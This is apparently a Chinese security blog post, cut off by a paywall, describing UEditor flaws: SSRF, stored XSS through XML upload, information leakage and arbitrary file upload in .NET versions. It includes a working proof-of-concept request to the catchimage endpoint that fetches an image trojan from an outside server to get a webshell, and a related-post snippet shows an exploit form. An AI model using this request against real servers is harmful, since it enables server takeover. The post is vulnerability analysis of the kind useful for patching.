老项目之UEditor漏洞问题

最新推荐文章于 2025-07-03 10:08:22 发布
原创 最新推荐文章于 2025-07-03 10:08:22 发布 · 5k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

本文详细分析了UEditor编辑器存在的安全问题,包括1.4.3版本的SSRF漏洞,允许内网探测;1.4.3.3和1.5.0版本的文件上传漏洞,可能导致服务器被控制;以及1.3.6版本的文件上传漏洞。同时,还探讨了1.4.3版本的Upload XSS风险,以及如何利用这些漏洞进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

1、文件上传漏洞

2、SSRF 漏洞

3、Upload XSS

ueidtor 安全漏洞 _ UEditor SSRF 漏洞 ( JSP 版本 ) 分析与复现

UEditor 是由百度开发的开源富文本编辑器,开源基于 BSD 协议 ,

小巧灵活 ,使用简单 ,有很多 web 程序在使用 UEditor 编辑器 。

1、项目所使用的 UEditor 组件存在 ssrf 漏洞

风险级别 : 低风险

风险分析 : 可通过此漏洞探测内容 ,甚至服务器权限

2、项目所使用的 UEditor 组件存在 xml 文件上传触发存储型 XSS 漏洞

风险级别 : 中风险

风险分析 : 可通过此漏洞盗取用户凭证,为黑产引流

3、项目所使用的 UEditor 组件目录下存在敏感信息泄漏

风险级别 : 中风险

风险分析 : 可通过此漏洞泄漏信息

1、文件上传漏洞

该任意文件上传漏洞存在于 1.4.3.3 、 1.5.0 和 1.3.6 版本中 ,

并且只有 ** .NET ** 版本受该漏洞影响 。

黑客可以利用该漏洞上传木马文件,执行命令控制服务器 。

ueditor 中已经下架 .net 版本 ,但历史版本中可以下载 1.4.3 版本 ,

但是否是 1.4.3.3 目前还没验证 。

* 该漏洞是由于 上传文件 时 ,使用的 CrawlerHandler 类未对 文件类型 进行检验 ,

导致了任意文件上传 。1.4.3.3 和 1.5.0 版本利用方式稍有不同 ,

1.4.3.3 需要一个能正确解析的域名 。而 1.5.0 用 IP 和 普通域名 都可以 。

* 相对来说 1.5.0 版本更加容易触发此漏洞 ;

而在 1.4.3.3 版本中攻击者需要提供一个正常的域名地址就可以绕过判断 ;

首先 1.5.0 版本进行测试 ,需要先在外网服务器上传一个图片木马 ,

比如 : 1.jpg/1.gif/1.png 都可以 ,下面 x.x.x.x 是外网服务器地址 ,

source[] 参数值改为图片木马地址 ,并在结尾加上 “?.aspx” 即可 getshell ,利用 POC :

POST /ueditor/net/controller.ashx?action=catchimage

source%5B%5D=https%3A%2F%2Fblue-sea-697d.quartiers047.workers.dev%3A443%2Fhttp%2Fx.x.x.x/1.gif?.aspx

复现成功会返回路径信息,可以看到木马已经成功被传上去了。

最低0.47元/天 解锁文章

200万优质内容无限畅学
Ueditor SSRF漏洞审计
qaq517384的博客
11-18 1926
没啥过滤也没啥需求,一般是张图片就能SSRF,source直接往里传。
UEditor编辑器任意文件上传漏洞分析
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
12-03 2056
ue下载地址http://http://ueditor.baidu.com/website/download.html exp <form action="http://192.168.1.103/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="sour
技术分享-ueditor漏洞利用&源码分析超详细分析
最新发布
logic1001的博客
07-03 976
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
实战纪实 | 编辑器漏洞Ueditor-任意文件上传漏洞洞新谈)
zkaqlaoniao的博客
04-12 2万+
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
挖洞经验|UEditor编辑器存储型XSS漏洞
MachineGunJoe666
05-29 5103
前言 UEditor是由百度web前端研发部开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点。UEditor存在一个XSS漏洞,编辑器在定义过滤规则的时候不严和读取内容的时候的绕过导致了该漏洞,此漏洞已经上报,由于技术略菜,有分析不到位的还请多多见谅。 漏洞成因分析 漏洞文件产生在前端配置文件ueditor.config.js: 以下为纯文本粘贴为true时的过滤规则,对一些危险的标签没有做过滤,怪不得好多二次开发的。 //纯文本粘贴模式下的过滤规则 //'filterT
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
Boom!脑洞大爆炸的博客
07-07 9960
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
技术分享|ueditor漏洞利用&源码分析超详细分析
baidu_38876334的博客
04-02 5440
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
ueditor】任意文件上传漏洞与解决方案
菜鸟成长史
08-02 3782
是一款颇为旧的富文本编辑器,曾经普遍流行过所以在一些项目里面,还会存在。但是该项目到目前为止已经永久停止更新,所以当发现漏洞时,只能自己维护。最好停止使用并更换富文本编辑器组件。
基于PHP的UEditor
07-15
- **整合到项目**:将UEditor的HTML和JavaScript引用添加到你的PHP页面中,确保路径正确。 - **测试与优化**:测试编辑器是否正常工作,如上传功能、多媒体插入等,根据需求进行个性化配置和优化。 2. **PHP接口...
记某次攻防演练:大战UEditor并突破
蚁景网安学院
06-28 693
UEditor作为热门常见漏洞,在大型企业集团中的.net旧系统中非常常见,相关的利用方法以及绕过方法需要非常熟练,方可快人一步迅速拿下权限。最近参与某次攻防演练,通过前期信息收集,发现某靶标单位存在某域名备案。通过fofa搜索子域名站点,发现存在一个子域名的61000端口开放着一个后台,于是开始进行渗透。
ueditor.zip
08-27
10. **维护与更新**:由于UEditor是持续更新的项目,建议关注其官方发布的新版本,以便及时获取最新的功能和修复的安全漏洞。同时,对于长期运行的项目,也需要考虑版本升级可能带来的兼容性问题。 以上是对...
Ueditor、FCKeditor、Kindeditor编辑器漏洞
网安君的博客
01-27 7059
UEditor是由百度web前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。Ueditor、FCKeditor、Kindeditor编辑器漏洞
Ueditor编辑器任意文件上传漏洞
m0_51468027的博客
07-30 2万+
一文学习Ueditor编辑器任意文件上传漏洞(部署环境到漏洞复现)
UEditor 任意文件上传漏洞
热门推荐
qq_50854662的博客
10-27 2万+
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文......
ueidtor安全漏洞_UEditor SSRF漏洞(JSP版本)分析与复现
weixin_33318722的博客
12-31 5392
作者: 浮萍@猎户安全实验室公众号:[猎户安全实验室](https://mp.weixin.qq.com/s/OPbyYQNWiN2dy_BHhqd9eg "猎户安全实验室")前些时间测试的时候遇到了一个系统采用了UEditor编辑器,版本为1.4.3。已知该编辑器v1.4.3版本存在SSRF漏洞,虽然是Bool型的SSRF,除了可以进行内网探测外,也可以根据web应用指纹信息,之后进行进一步的测...
百度html编辑器 xss,百度ueditor编辑器-xss漏洞
weixin_33871933的博客
06-25 1239
百度ueditor编辑器 xss漏洞一、漏洞简介产品官网下载地址:涉及版本:php , asp, jsp, net二、漏洞影响三、复现过程漏洞分析存在漏洞的文件:/php/getContent.php/asp/getContent.asp/jsp/getContent.jsp/net/getContent.ashx/php/getContent.php入进行了过滤,但是在14行输出时却使用了htm...
技术分享-ueditor漏洞利用&源码分析超详细分析 (2)
小司机的奥拓
11-25 1028
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
ue编辑器漏洞_ueditor编辑器上传漏洞
weixin_39965673的博客
12-21 249
UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。开源基于BSD协议,所有源代码在协议允许范围内可自由修改和使用。百度UEditor的推出,可以帮助不少网站开发者在开发富文本编辑器所遇到的难题,节约开发者因开发富文本编辑器所需要的大量时间,有效降低了企业的开发成本。ueditor ASPX 版本由于远程抓取代码缺陷导致的安全漏洞, 官方...
Ueditor使用教程与问题解析
- 安全问题可能涉及防止文件上传漏洞,需要在后端做好文件类型检查和验证。 - 兼容性问题主要指ueditor在不同浏览器中的表现,需要针对具体问题查找官方文档或社区反馈,寻找解决方法。 5. ueditor的二次开发与...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值